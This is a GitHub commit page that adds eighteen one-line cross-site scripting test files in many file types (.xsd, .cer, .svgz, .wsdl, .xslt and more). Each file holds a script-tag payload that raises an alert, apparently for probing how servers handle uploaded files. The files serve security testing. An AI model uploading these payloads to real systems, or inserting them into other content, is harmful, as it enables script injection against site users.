Skip to content

Commit

Permalink
XSS in several filetype based on @__Mn1__ blogpost
Browse files Browse the repository at this point in the history
  • Loading branch information
swisskyrepo committed Mar 26, 2019
1 parent 90b182f commit bbc9029
Show file tree
Hide file tree
Showing 18 changed files with 18 additions and 1 deletion.
1 change: 1 addition & 0 deletions XSS Injection/Files/xml.xsd
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
1 change: 1 addition & 0 deletions XSS Injection/Files/xss.cer
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<script>alert(1)</script>
1 change: 1 addition & 0 deletions XSS Injection/Files/xss.dtd
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
1 change: 1 addition & 0 deletions XSS Injection/Files/xss.htm
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<script>alert(1)</script>
1 change: 1 addition & 0 deletions XSS Injection/Files/xss.html.demo
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
1 change: 1 addition & 0 deletions XSS Injection/Files/xss.hxt
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<script>alert(1)</script>
1 change: 1 addition & 0 deletions XSS Injection/Files/xss.mno
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1337)</a:script>
1 change: 1 addition & 0 deletions XSS Injection/Files/xss.rdf
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
1 change: 1 addition & 0 deletions XSS Injection/Files/xss.svgz
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
1 change: 1 addition & 0 deletions XSS Injection/Files/xss.vml
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
1 change: 1 addition & 0 deletions XSS Injection/Files/xss.wsdl
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
1 change: 1 addition & 0 deletions XSS Injection/Files/xss.xht
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
1 change: 1 addition & 0 deletions XSS Injection/Files/xss.xhtml
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>

<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
<info>
<name>
<value><![CDATA[<script>confirm(document.domain)</script>]]></value>
Expand Down
1 change: 1 addition & 0 deletions XSS Injection/Files/xss.xsd
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
1 change: 1 addition & 0 deletions XSS Injection/Files/xss.xsf
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
1 change: 1 addition & 0 deletions XSS Injection/Files/xss.xsl
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
1 change: 1 addition & 0 deletions XSS Injection/Files/xss.xslt
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>

0 comments on commit bbc9029

Please sign in to comment.